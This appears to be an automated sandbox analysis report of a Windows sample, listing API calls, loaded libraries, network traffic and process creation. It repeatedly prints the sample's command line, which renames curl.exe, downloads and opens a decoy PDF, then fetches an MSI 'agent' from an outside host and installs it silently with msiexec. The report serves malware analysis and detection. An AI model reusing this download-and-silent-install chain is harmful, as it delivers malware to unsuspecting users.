Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00103EA4 _strdup,fopen,free,fseek,ftell,fread,fclose,free,free,fseek,malloc,malloc,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,free, |
3_2_00103EA4 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_0010F820 CryptAcquireContextA,CryptCreateHash, |
3_2_0010F820 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_0010F02B CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx, |
3_2_0010F02B |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_0010F860 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, |
3_2_0010F860 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_0010EC10 malloc,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError, |
3_2_0010EC10 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00106400 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, |
3_2_00106400 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00106591 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, |
3_2_00106591 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_0010C6E0 malloc,CryptAcquireContextA,CryptCreateHash,CryptReleaseContext, |
3_2_0010C6E0 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_0010C730 CryptHashData, |
3_2_0010C730 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_0010C750 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, |
3_2_0010C750 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: -----BEGIN PUBLIC KEY----- |
3_2_000E77F7 |
Source: TNheBOJElq.exe |
Binary or memory string: -----BEGIN PUBLIC KEY----- |
|
Source: unknown |
HTTPS traffic detected: 8.209.119.17:443 -> 192.168.2.5:49706 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 8.209.119.17:443 -> 192.168.2.5:49709 version: TLS 1.2 |
Source: |
Binary string: curl.pdb source: TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr |
Source: Joe Sandbox View |
JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_000DDB77 recv,WSAGetLastError, |
3_2_000DDB77 |
Source: global traffic |
HTTP traffic detected: GET /download/pdf HTTP/1.1Host: dbs5.pwods.comUser-Agent: curl/7.83.1Accept: */* |
Source: global traffic |
HTTP traffic detected: GET /download/agent HTTP/1.1Host: dbs5.pwods.comUser-Agent: curl/7.83.1Accept: */* |
Source: TNheBOJElq.exe |
String found in binary or memory: Usage: curl [options...] <url> |
Source: TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp |
String found in binary or memory: Usage: curl [options...] <url> |
Source: TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp |
String found in binary or memory: Usage: curl [options...] <url> |
Source: TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp |
String found in binary or memory: Usage: curl [options...] <url> |
Source: TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp |
String found in binary or memory: Usage: curl [options...] <url> |
Source: TNheBOJElq.exe.0.dr |
String found in binary or memory: Usage: curl [options...] <url> |
Source: global traffic |
DNS traffic detected: DNS query: dbs5.pwods.com |
Source: TNheBOJElq.exe, 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071765607.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr |
String found in binary or memory: https://curl.se/P |
Source: TNheBOJElq.exe, 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071765607.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr |
String found in binary or memory: https://curl.se/docs/copyright.htmlD |
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr |
String found in binary or memory: https://curl.se/docs/hsts.html |
Source: TNheBOJElq.exe |
String found in binary or memory: https://curl.se/docs/hsts.html# |
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr |
String found in binary or memory: https://curl.se/docs/http-cookies.html |
Source: TNheBOJElq.exe |
String found in binary or memory: https://curl.se/docs/http-cookies.html# |
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr |
String found in binary or memory: https://curl.se/docs/sslcerts.html |
Source: TNheBOJElq.exe |
String found in binary or memory: https://curl.se/docs/sslcerts.htmlcurl |
Source: TNheBOJElq.exe.0.dr |
String found in binary or memory: https://curl.se/libcurl/c/curl_easy_setopt.html |
Source: TNheBOJElq.exe, 00000004.00000002.2071871975.0000000002D70000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://dbs5.pwods.com/download/agent |
Source: TNheBOJElq.exe, 00000003.00000002.2055325705.0000000002A58000.00000004.00000020.00020000.00000000.sdmp, TNheBOJElq.exe, 00000003.00000003.2053825085.0000000002A85000.00000004.00000020.00020000.00000000.sdmp, TNheBOJElq.exe, 00000003.00000003.2053256528.0000000002A85000.00000004.00000020.00020000.00000000.sdmp, TNheBOJElq.exe, 00000003.00000002.2055431756.0000000002A85000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://dbs5.pwods.com/download/pdf |
Source: unknown |
Network traffic detected: HTTP traffic on port 49709 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49706 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49709 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49706 |
Source: unknown |
HTTPS traffic detected: 8.209.119.17:443 -> 192.168.2.5:49706 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 8.209.119.17:443 -> 192.168.2.5:49709 version: TLS 1.2 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_000D1535 |
3_2_000D1535 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_000FA8D8 |
3_2_000FA8D8 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_000CE127 |
3_2_000CE127 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_000DA9B3 |
3_2_000DA9B3 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_000EC1FD |
3_2_000EC1FD |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_0010CAA0 |
3_2_0010CAA0 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_000DFAEC |
3_2_000DFAEC |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_001133B0 |
3_2_001133B0 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_000D4415 |
3_2_000D4415 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_000E25B8 |
3_2_000E25B8 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: String function: 000DD6AD appears 302 times |
|
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: String function: 000C913E appears 64 times |
|
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: String function: 000D201D appears 39 times |
|
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: String function: 000D20E6 appears 46 times |
|
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: String function: 000DD632 appears 246 times |
|
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: String function: 000D2564 appears 48 times |
|
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: String function: 000D251E appears 48 times |
|
Source: classification engine |
Classification label: clean8.win@11/3@1/2 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_000C310D CreateToolhelp32Snapshot,GetLastError,CloseHandle,Module32First,Module32Next, |
3_2_000C310D |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2764:120:WilError_03 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: TNheBOJElq.exe |
String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all". |
Source: TNheBOJElq.exe |
String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all". |
Source: TNheBOJElq.exe |
String found in binary or memory: curl: try 'curl --help' for more information |
Source: TNheBOJElq.exe |
String found in binary or memory: curl: try 'curl --help' for more information |
Source: TNheBOJElq.exe |
String found in binary or memory: curl: try 'curl --help' for more information |
Source: TNheBOJElq.exe |
String found in binary or memory: curl: try 'curl --help' for more information |
Source: TNheBOJElq.exe |
String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all". |
Source: TNheBOJElq.exe |
String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all". |
Source: unknown |
Process created: C:\Windows\SysWOW64\cmd.exe cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf & "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn" |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\" |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn |
|
Source: unknown |
Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\" |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: fwpuclnt.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: schannel.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: mskeyprotect.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: ntasn1.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: ncrypt.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: ncryptsslp.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: fwpuclnt.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: schannel.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: mskeyprotect.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: ntasn1.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: ncrypt.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: ncryptsslp.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: aclayers.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: sfc.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: sfc_os.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: msi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: srpapi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: tsappcmp.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: netapi32.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: wkscli.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: aclayers.dll |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: sfc.dll |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: sfc_os.dll |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: msi.dll |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: tsappcmp.dll |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: netapi32.dll |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: wkscli.dll |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: |
Binary string: curl.pdb source: TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_000DD33A GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free, |
3_2_000DD33A |
Source: C:\Windows\System32\msiexec.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
API coverage: 8.3 % |
Source: C:\Windows\System32\conhost.exe |
Last function: Thread delayed |
Source: C:\Windows\System32\conhost.exe |
Last function: Thread delayed |
Source: TNheBOJElq.exe, 00000004.00000003.2071234434.0000000002F60000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll |
Source: TNheBOJElq.exe, 00000003.00000003.2053382620.0000000002A60000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|| |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_0011155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
3_2_0011155B |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_000DD33A GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free, |
3_2_000DD33A |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00110CB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
3_2_00110CB4 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_0011155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
3_2_0011155B |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_001116BE SetUnhandledExceptionFilter, |
3_2_001116BE |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\" |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn |
Jump to behavior |
Source: unknown |
Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ""c:\windows\system32\cmd.exe" /c cd /d "c:\users\gloza\appdata\local\temp\" & copy c:\windows\system32\curl.exe tnhebojelq.exe & tnhebojelq.exe -o "c:\users\gloza\documents\qmqjabdqio.pdf" https://dbs5.pwods.com/download/pdf & "c:\users\gloza\documents\qmqjabdqio.pdf" & tnhebojelq.exe -o blhlldebqq.msi https://dbs5.pwods.com/download/agent & c:\windows\system32\msiexec.exe /i blhlldebqq.msi /qn" |
Source: C:\Windows\SysWOW64\cmd.exe |
Queries volume information: C:\ VolumeInformation |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Queries volume information: C:\ VolumeInformation |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00111775 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, |
3_2_00111775 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_0010699F socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket, |
3_2_0010699F |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_000FA8D8 calloc,calloc,___from_strstr_to_strchr,___from_strstr_to_strchr,inet_pton,strncpy,___from_strstr_to_strchr,strtoul,___from_strstr_to_strchr,strtoul,getsockname,WSAGetLastError,free,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,free,free, |
3_2_000FA8D8 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_000F8490 calloc,calloc,calloc,calloc,calloc,calloc,bind,WSAGetLastError, |
3_2_000F8490 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_000DDEDF strncmp,strncmp,inet_pton,inet_pton,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError, |
3_2_000DDEDF |